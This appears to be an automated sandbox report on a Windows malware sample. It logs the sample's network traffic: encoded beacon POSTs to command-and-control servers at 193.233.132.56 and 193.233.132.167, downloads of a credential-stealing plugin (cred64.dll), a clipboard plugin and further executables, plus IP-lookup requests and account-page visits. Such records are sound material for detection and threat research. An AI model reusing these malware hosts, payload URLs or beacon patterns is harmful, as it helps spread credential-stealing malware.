                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49709 version: TLS 1.0
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00B8D8D0 recv,recv,recv,recv,0_2_00B8D8D0
                              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=YVSahsnONFm9PMs&MD=We8PUgeO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=YVSahsnONFm9PMs&MD=We8PUgeO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                              Source: global trafficHTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=480920124&timestamp=1713490161736 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jRQWsnrOSN4; VISITOR_INFO1_LIVE=uxbWyiEqJyc; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgJw%3D%3D
                              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
                              Source: global trafficHTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
                              Source: global trafficHTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
                              Source: global trafficHTTP traffic detected: GET /mine/amert.exe HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
                              Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: GET /cost/sarra.exe HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: GET /enigma/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: GET /lend/build12.exe HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: GET /lend/build12.exe HTTP/1.1Host: 193.233.132.167If-Modified-Since: Fri, 19 Apr 2024 00:20:52 GMTIf-None-Match: "6621b8e4-17e00"
                              Source: global trafficHTTP traffic detected: GET /enigma/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.167
                              Source: 831840b410.exe, 0000001F.00000003.3234149280.0000000004060000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000002.3243043765.0000000004062000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3237964866.0000000004062000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/accountfmF( equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 00000010.00000003.3105319797.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3102067403.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000002.3115654406.0000000000FCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/accountp equals www.youtube.com (Youtube)
                              Source: MPGPH131.exe, 0000001C.00000003.3043589855.0000000007CB2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3032607881.0000000007CC7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3047846067.0000000007DD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Khttps://www.youtube.com/account equals www.youtube.com (Youtube)
                              Source: MPGPH131.exe, 0000001D.00000003.3039143770.00000000079EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKJqaiC2kMEiuCgpI4CDA9zdQR9Ma_4VO4V4SsWE5FBoZnSBBlUHdjOISz2jXF92hxTK-U9yBg equals www.youtube.com (Youtube)
                              Source: MPGPH131.exe, 0000001D.00000003.3039143770.00000000079EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
                              Source: MPGPH131.exe, 0000001D.00000003.3039143770.00000000079EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKLYPILSqGGJxF99XUM7ry_ZpWfAteaIP49LuGs_pX6vyTY-I4NhOGVeIl3pV2a7zJNZmB6a&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-284379341%3A1713490158071679&theme=mn&ddm=0 equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3237599781.0000000003FB4000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3207722657.0000000003FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/account7 equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountA equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountJ equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 00000010.00000003.3086222866.0000000003789000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3110190311.00000000037C9000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3087346454.00000000037C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountL equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountM) equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountT) equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 0000002F.00000003.3477995978.00000000040EE000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000002F.00000003.3475843478.00000000040CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/account[C equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountd* equals www.youtube.com (Youtube)
                              Source: unknownDNS traffic detected: queries for: www.youtube.com
                              Source: MPGPH131.exe, 0000001D.00000002.3260917756.0000000007DC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                              Source: MPGPH131.exe, 0000001D.00000002.3260917756.0000000007DC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
